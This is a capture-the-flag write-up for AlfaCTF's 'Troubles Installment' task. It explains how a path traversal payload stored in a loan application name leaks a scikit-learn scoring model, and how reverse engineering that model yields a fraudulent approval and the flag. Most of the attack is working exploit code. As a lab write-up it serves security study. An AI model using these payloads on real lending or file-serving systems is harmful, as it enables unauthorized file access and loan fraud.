web · free · hard

Troubles Installment

alfactf

Task: Flask credit scoring app with ML-based loan approval; ULTRA-LOW-RISK product reveals flag but requires ML model approval. Solution: path traversal in document download to extract sklearn model, reverse engineer threshold and special categorical values, craft application that passes ML scoring.

$ ls tags/ techniques/
path_traversal_via_db_field  ml_model_extraction  sklearn_model_reverse_engineering  feature_bruteforce  threshold_bypass

Troubles Installment — AlfaCTF

Description

"Karabin Capital" is a credit scoring web application where users submit loan applications. The goal is to get an approved "ULTRA-LOW-RISK" loan, which reveals the flag.

The application is a Flask web service with PostgreSQL backend. Users register, submit loan applications with personal and financial data, and receive approval decisions. Applications with amount <= 10000 are auto-approved as MICRO-CASH. Larger amounts go through an ML scoring model (sklearn RandomForestClassifier). The ULTRA-LOW-RISK product requires amount >= 500000 AND ML model approval (probability >= threshold), and reveals the flag upon approval.

Analysis

Application Architecture

  • Flask web application with PostgreSQL database
  • ReportLab for PDF document generation
  • sklearn RandomForestClassifier for credit scoring
  • Two-tier approval logic:
    • amount <= 10000: auto-approved as MICRO-CASH
    • amount > 10000: requires ML model scoring
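The routing described above can be summarized in a few lines. This is a minimal sketch, not the application's code: the function name `decide`, the constant names, and the `SCORED-LOAN` label for amounts between the two limits are assumptions made for illustration. Only the two limits and the MICRO-CASH and ULTRA-LOW-RISK product names come from the task.

```python
from typing import Optional, Tuple

MICRO_CASH_LIMIT = 10_000          # amount <= 10000 is auto-approved
ULTRA_LOW_RISK_MINIMUM = 500_000   # ULTRA-LOW-RISK needs amount >= 500000


def decide(amount: int, probability: Optional[float], threshold: float) -> Tuple[bool, str]:
    """Return (approved, product_code) for a single application."""
    if amount <= MICRO_CASH_LIMIT:
        # Small loans never reach the model.
        return True, "MICRO-CASH"
    approved = probability is not None and probability >= threshold
    if amount >= ULTRA_LOW_RISK_MINIMUM:
        return approved, "ULTRA-LOW-RISK"
    # Hypothetical label: the mid-range product is not named in the task.
    return approved, "SCORED-LOAN"


small = decide(5_000, None, threshold=0.93)
large_ok = decide(1_000_000, 0.9915, threshold=0.93)
large_rejected = decide(1_000_000, 0.50, threshold=0.93)
```

The sketch makes the attack plan visible: the small branch is useful for getting any approved application (and therefore a document to download), while the flag sits behind the model-gated branch.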

Vulnerability Discovery

The vulnerability is in the download_document function (app.py lines 820-864):

    @app.get("/api/applications/<application_id>/document")
    def download_document(application_id: str) -> Response:
        ...
        base_dir = STORAGE_ROOT / user["public_uuid"] / user["login"]
        unsafe_path = base_dir / row["name"]  # row["name"] = application_name from DB
        safe_path = safe_document_path(user, row["name"])
        ...
        target_path = unsafe_path if unsafe_path.exists() else safe_path
        file_bytes = target_path.read_bytes()  # Reads arbitrary file!

The application_name field from the database is used directly in file path construction without sanitization. When creating an application, the user controls the application_name field, which gets stored in the database and later used to construct the file path for document download.
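The effect of joining an unsanitized name onto a base directory can be reproduced locally. The sketch below is an illustration under assumptions, not the challenge code: the directory layout, the file `model.bin`, and the helpers `unsafe_join` and `is_inside` are hypothetical. The containment check shows one common way such a join could be guarded.

```python
import tempfile
from pathlib import Path


def unsafe_join(base_dir: Path, name: str) -> Path:
    # Mirrors the vulnerable pattern: the stored name is appended verbatim.
    return base_dir / name


def is_inside(base_dir: Path, candidate: Path) -> bool:
    # Resolve ".." segments and symlinks first, then check containment.
    base = base_dir.resolve()
    target = candidate.resolve()
    return target == base or base in target.parents


with tempfile.TemporaryDirectory() as tmp:
    root = Path(tmp)
    base_dir = root / "data" / "storage" / "uuid" / "login"  # hypothetical layout
    base_dir.mkdir(parents=True)
    secret = root / "secrets" / "model.bin"                  # hypothetical file
    secret.parent.mkdir()
    secret.write_bytes(b"model-bytes")

    escaped = unsafe_join(base_dir, "../../../../secrets/model.bin")
    leaked = escaped.read_bytes()  # the read succeeds outside base_dir
    escaped_is_inside = is_inside(base_dir, escaped)
    normal_is_inside = is_inside(base_dir, unsafe_join(base_dir, "report.pdf"))
```

Because `pathlib` does not collapse `..` when joining, the operating system resolves the segments at read time, which is why the exists-then-read fallback in the handler returns whatever file the name points to.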

Path Traversal Calculation

  • Base path: /srv/karabin/data/storage/{uuid}/{login}/
  • Target file: /srv/karabin/secrets/karabin-ratebook (the ML model)
  • Traversal payload: ../../../../secrets/karabin-ratebook
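The number of `..` segments can be checked mechanically instead of counted by hand. A minimal sketch, assuming POSIX paths on the server; `UUID` and `LOGIN` are placeholders for the per-user directory names, and `traversal_payload` is a helper name introduced here:

```python
import posixpath


def traversal_payload(base_dir: str, target: str) -> str:
    # Relative path that leads from base_dir to target.
    return posixpath.relpath(target, start=base_dir)


base_dir = "/srv/karabin/data/storage/UUID/LOGIN"  # placeholders for {uuid}/{login}
target = "/srv/karabin/secrets/karabin-ratebook"

payload = traversal_payload(base_dir, target)
# Joining the payload back onto the base and normalizing should land on the target.
resolved = posixpath.normpath(posixpath.join(base_dir, payload))
```

Four `..` segments climb out of `{login}`, `{uuid}`, `storage`, and `data`, leaving `/srv/karabin`, from which `secrets/karabin-ratebook` is reachable.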

Solution

Step 1: Extract the ML Model via Path Traversal

    import requests

    BASE_URL = 'https://capital-xxx.alfactf.ru'
    session = requests.Session()

    # Register a new user
    session.post(f'{BASE_URL}/api/register', json={
        'login': 'attacker01',
        'password': 'password123'
    })

    # Create an application with path traversal in the name
    # Amount <= 10000 ensures auto-approval (needed to get document_url)
    application_data = {
        'application_name': '../../../../secrets/karabin-ratebook',
        'birth_date': '1990-01-01',
        'last_name': 'Test',
        'first_name': 'Test',
        'patronymic': 'Test',
        'annual_income': 100000,
        'monthly_expenses': 5000,
        'amount': 5000,  # <= 10000 for auto-approve
        'term_months': 12,
        'karabin_payroll_project': '0',
        'housing_type': 'Rented apartment',
        'occupation_type': 'IT staff',
        'education_type': 'Higher education',
        'family_status': 'Single / not married'
    }
    response = session.post(f'{BASE_URL}/api/applications', json=application_data)
    app_id = response.json()['application']['id']

    # Download the "document" - actually retrieves the ML model!
    response = session.get(f'{BASE_URL}/api/applications/{app_id}/document')
    # Content-Type will be application/octet-stream (not PDF)
    with open('karabin-ratebook', 'wb') as f:
        f.write(response.content)
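A quick look at the first bytes of the download helps confirm that the traversal worked and a generated PDF was not returned instead. This is a sketch under assumptions: the helper names are introduced here, and it assumes the model file is an uncompressed pickle stream, which may not hold if it was saved with compression.

```python
import pickle


def looks_like_pdf(data: bytes) -> bool:
    # PDF files begin with the "%PDF-" header.
    return data.startswith(b"%PDF-")


def looks_like_pickle(data: bytes) -> bool:
    # Pickle protocol 2 and later begin with the PROTO opcode 0x80
    # followed by the protocol number.
    return len(data) >= 2 and data[0] == 0x80 and 2 <= data[1] <= pickle.HIGHEST_PROTOCOL


# Stand-ins for response.content in the two possible outcomes.
sample_pdf = b"%PDF-1.4\n% placeholder body"
sample_model = pickle.dumps({"threshold": 0.93})

pdf_checks = (looks_like_pdf(sample_pdf), looks_like_pickle(sample_pdf))
model_checks = (looks_like_pdf(sample_model), looks_like_pickle(sample_model))
```

In the exploit script the same helpers would be applied to `response.content` before writing it to disk.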

Step 2: Analyze the ML Model

    import joblib
    import pandas as pd

    # Load the extracted model bundle
    bundle = joblib.load('karabin-ratebook')
    print(bundle.keys())  # ['pipeline', 'threshold', 'features']

    # Critical finding: approval threshold
    print(f"Threshold: {bundle['threshold']}")  # 0.93

    pipeline = bundle['pipeline']
    # Pipeline structure: ColumnTransformer (preprocessor) + RandomForestClassifier

    # Extract categorical feature encodings
    preprocessor = pipeline.steps[0][1]
    cat_encoder = preprocessor.named_transformers_['categorical']

    # Discovered CTF-specific categories hidden in the model:
    # LAST_NAME categories include: 'Цтфный' (CTF hint!)
    # FIRST_NAME categories include: 'Лев'
    # PATRONYMIC categories include: 'Альфабанкович' (CTF hint!)

Key findings from model analysis:

  • Threshold = 0.93: Need probability >= 0.93 for ULTRA-LOW-RISK approval
  • CTF-specific names: The model was trained with special categorical values that give high approval probability:
    • Last name: "Цтфный" (literally "CTF-like")
    • First name: "Лев"
    • Patronymic: "Альфабанкович" (contains "Alfa" - the CTF organizer)
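Learned category values such as these can be listed from a fitted encoder. The sketch below uses a toy preprocessor in place of the extracted one and assumes the `categorical` transformer is a plain `OneHotEncoder`; in the real bundle it could be a nested pipeline, in which case the encoder step would need to be picked out first. The toy names `Ivanov`, `Petrov`, `Ivan`, and `Petr` are illustrative.

```python
import numpy as np
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder

# Toy training data standing in for the real training set (assumption).
column_names = ["LAST_NAME", "FIRST_NAME"]
X = np.array(
    [
        ["Ivanov", "Ivan"],
        ["Petrov", "Petr"],
        ["Цтфный", "Лев"],
    ],
    dtype=object,
)

preprocessor = ColumnTransformer(
    [("categorical", OneHotEncoder(handle_unknown="ignore"), [0, 1])]
)
preprocessor.fit(X)

# Same lookup as in the writeup, then one category array per input column.
encoder = preprocessor.named_transformers_["categorical"]
categories = {
    name: [str(value) for value in values]
    for name, values in zip(column_names, encoder.categories_)
}

for name, values in categories.items():
    print(name, values)
```

Values that look out of place among ordinary names are good candidates for the feature search in the next step.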

Step 3: Find Winning Parameters

A brute-force search over the feature values looks for a combination that reaches probability >= 0.93. The profile built from the CTF-specific names passes comfortably:

    import numpy as np
    from itertools import product

    # Test the CTF-specific profile
    profile = {
        'LAST_NAME': 'Цтфный',
        'FIRST_NAME': 'Лев',
        'PATRONYMIC': 'Альфабанкович',
        'AGE_YEARS': 35,
        'AMT_INCOME_TOTAL': 5000000,
        'REQUESTED_AMOUNT': 1000000,
        'REQUESTED_TERM_MONTHS': 36,
        'MONTHLY_EXPENSES': 100000,
        'KARABIN_PAYROLL_PROJECT': 1,
        'NAME_HOUSING_TYPE': 'Office apartment',
        'OCCUPATION_TYPE': 'High skill tech staff',
        'NAME_EDUCATION_TYPE': 'Higher education',
        'NAME_FAMILY_STATUS': 'Married',
    }
    df = pd.DataFrame([profile])
    proba = pipeline.predict_proba(df)[0][1]
    print(f"Probability: {proba}")  # 0.9915 >= 0.93 ✓
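The search loop itself could look roughly like the sketch below. It is an illustration only: `search` is a helper name introduced here, and `toy_score` is a hypothetical stand-in for the extracted model so that the example runs without the model file. Its weights are invented and say nothing about the real classifier.

```python
from itertools import product
from typing import Callable, Dict, Iterator, List, Tuple

Profile = Dict[str, object]


def search(
    score: Callable[[Profile], float],
    fixed: Profile,
    grid: Dict[str, List[object]],
    threshold: float,
) -> Iterator[Tuple[Profile, float]]:
    """Yield every grid combination whose score reaches the threshold."""
    names = list(grid)
    for values in product(*(grid[name] for name in names)):
        candidate = {**fixed, **dict(zip(names, values))}
        probability = score(candidate)
        if probability >= threshold:
            yield candidate, probability


def toy_score(profile: Profile) -> float:
    # Hypothetical scorer with made-up weights, NOT the real model.
    value = 0.5
    if profile["LAST_NAME"] == "Цтфный":
        value += 0.3
    if profile["KARABIN_PAYROLL_PROJECT"] == 1:
        value += 0.1
    if profile["REQUESTED_TERM_MONTHS"] <= 36:
        value += 0.05
    return value


grid = {
    "LAST_NAME": ["Ivanov", "Цтфный"],
    "KARABIN_PAYROLL_PROJECT": [0, 1],
    "REQUESTED_TERM_MONTHS": [12, 36, 60],
}
hits = list(search(toy_score, {"REQUESTED_AMOUNT": 1_000_000}, grid, threshold=0.93))
```

With the extracted bundle, `score` would instead wrap the call shown above, `pipeline.predict_proba(pd.DataFrame([candidate]))[0][1]`, and the grid would cover the categories recovered from the encoder.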

Step 4: Submit Winning Application

    from datetime import date

    # Birth date chosen so that the applicant is about 35 years old
    birth_date = date(1991, 1, 15)

    # `session` and BASE_URL are reused from Step 1
    winning_application = {
        'application_name': 'ULTRA_LOW_RISK_WIN',
        'birth_date': birth_date.isoformat(),  # '1991-01-15'
        'last_name': 'Цтфный',
        'first_name': 'Лев',
        'patronymic': 'Альфабанкович',
        'annual_income': 5000000,
        'monthly_expenses': 100000,
        'amount': 1000000,  # >= 500000 for ULTRA-LOW-RISK
        'term_months': 36,
        'karabin_payroll_project': '1',
        'housing_type': 'Office apartment',
        'occupation_type': 'High skill tech staff',
        'education_type': 'Higher education',
        'family_status': 'Married'
    }
    response = session.post(f'{BASE_URL}/api/applications', json=winning_application)
    data = response.json()['application']
    print(f"Status: {data['status']}")  # approved
    print(f"Product: {data['product_code']}")  # ULTRA-LOW-RISK
    print(f"Flag: {data['flag']}")
    # alfa{b4NK_CreDIt_ScoR3_was_5Tol3N_4ND_lo4n_w45_r3cEIV3d}
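The hardcoded birth date yields an age of 35 only within a one-year window, so it is worth checking against the current date before reusing the payload. A minimal sketch, assuming the server derives `AGE_YEARS` as completed whole years (the source does not show how it is computed); `age_on` and the sample dates are illustrative:

```python
from datetime import date


def age_on(birth_date: date, today: date) -> int:
    """Completed years between birth_date and today."""
    years = today.year - birth_date.year
    # Subtract one if this year's birthday has not happened yet.
    if (today.month, today.day) < (birth_date.month, birth_date.day):
        years -= 1
    return years


birth_date = date(1991, 1, 15)
age_mid_2026 = age_on(birth_date, date(2026, 6, 1))
age_before_birthday = age_on(birth_date, date(2026, 1, 14))
age_on_birthday = age_on(birth_date, date(2026, 1, 15))
```

If the computed age drifts from the value used in the offline scoring, the birth date can be shifted by the same number of years so that the submitted features match the tested profile.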
